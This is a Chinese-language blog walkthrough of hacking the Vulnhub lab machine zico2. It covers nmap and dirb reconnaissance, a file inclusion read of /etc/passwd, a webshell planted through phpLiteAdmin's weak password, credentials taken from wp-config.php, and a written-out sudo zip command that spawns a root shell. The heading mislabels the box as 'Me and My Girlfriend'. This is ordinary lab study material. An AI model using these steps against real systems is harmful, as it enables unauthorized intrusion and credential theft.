本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记

前文链接

  1. WAMP/DVWA/sqli-labs 搭建
  2. burpsuite工具抓包及Intruder暴力破解的使用
  3. 目录扫描,请求重发,漏洞扫描等工具的使用
  4. 网站信息收集及nmap的下载使用
  5. SQL注入(1)——了解成因和手工注入方法
  6. SQL注入(2)——各种注入
  7. SQL注入(3)——SQLMAP
  8. SQL注入(4)——实战SQL注入拿webshell
  9. Vulnhub之Me and My Girlfriend
  10. XSS漏洞
  11. 文件上传漏洞
  12. 文件上传绕过
  13. 文件包含漏洞

介绍

Vulnhub它是一个提供各种漏洞环境的平台,官方链接:https://www.vulnhub.com/

Me and My Girlfriend

Zico 正在尝试构建他的网站,但在选择要使用的 CMS 时遇到了一些麻烦。在尝试了一些流行的之后,他决定建立自己的。这是个好主意吗?

安装

下载地址 https://www.vulnhub.com/entry/zico2-1,210/
在这里选择下载镜像文件
在这里插入图片描述
下载好之后有一个 .ova 文件
在这里插入图片描述
然后用VM虚拟机导入
在这里插入图片描述

弹出该窗口时选择重试
在这里插入图片描述
在虚拟机配置中把网络设置为NAT模式这样靶机和kali在同一网段
在这里插入图片描述
开机,出现以下界面即可
在这里插入图片描述

信息收集

在kali中输入ip a,获取当前网络信息
在这里插入图片描述
通过nmap扫描网段,获取靶机的ip地址

nmap -sn 192.168.157.0/24

在这里插入图片描述
得到靶机ip 192.168.157.140

扫描靶机开放的端口

nmap -A 192.168.157.140

在这里插入图片描述
开放了22(ssh)、80(http)和111(rpc)端口,是个网站服务器。

Web安全

浏览器访问
在这里插入图片描述
随便翻一下,在某处发现了文件包含位置,怀疑存在文件包含漏洞
在这里插入图片描述
在url处尝试包含**/etc/passwd**
在这里插入图片描述
包含成功,说明存在文件包含漏洞

利用dirb扫描网站目录

dirb http://192.168.157.140/

扫到了dbadmin目录,访问发现有一个名为test_db.php的文件,打开这个php文件发现是phpLiteAdmin的登录界面
在这里插入图片描述
在这里插入图片描述在这里插入图片描述

尝试弱口令admin,成功登录
在这里插入图片描述
phpLiteAdmin的版本是1.9.3,在kali中搜索相关漏洞

searchsploit phpLiteAdmin

在这里插入图片描述
第三个漏洞可用,访问该文件

cd /usr/share/exploitdb/exploits/php/webapps/
cat 24044.txt

在这里插入图片描述
创建一个名为hack.php的数据库
在这里插入图片描述
创建一个新表,一个字段
在这里插入图片描述

在默认值处写入一句话木马
在这里插入图片描述
接下来利用包含漏洞包含hack.php
http://192.168.157.140/view.php?page=…/…/…/…/…/usr/databases/hack.php
在这里插入图片描述
发现一句话木马成功执行了

蚁剑连接
在这里插入图片描述
访问**/home**,发现有一个名为zico的文件夹
在这里插入图片描述
在里面有一个to_do.txt
to_do.txt

try list:
- joomla
- bootstrap (+phpliteadmin)
- wordpress

告诉我们有WordPress,访问WordPress目录查看信息
在这里插入图片描述
查看配置文件wp-config.php,得到了一个账号密码
在这里插入图片描述
uname:zico
passwd:sWfCsfJSPV9H3AmQzw8

用finalshell连接ssh
在这里插入图片描述
连接成功

提权

我们此时还是普通用户,要尝试提升到root权限

输入sudo -l查看用户可执行的指令
在这里插入图片描述
发现我们可以以root权限执行zip指令,尝试通过zip提权
参考 https://blog.csdn.net/weixin_46700042/article/details/109649363

回到根目录,创建文件夹**/tmp/tiquan**

touch /tmp/tiquan

接下来运行指令获取root权限

sudo -u root zip /tmp/tiquan.zip /tmp/tiquan -T --unzip-command="sh -c /bin/bash"

成功提权
在这里插入图片描述
查看root目录,得到flag.txt
在这里插入图片描述

#
#
#
# ROOOOT!
# You did it! Congratz!
# 
# Hope you enjoyed! 
# 
# 
#
#


版权声明:本文为realmels原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
原文链接:https://blog.csdn.net/realmels/article/details/118466408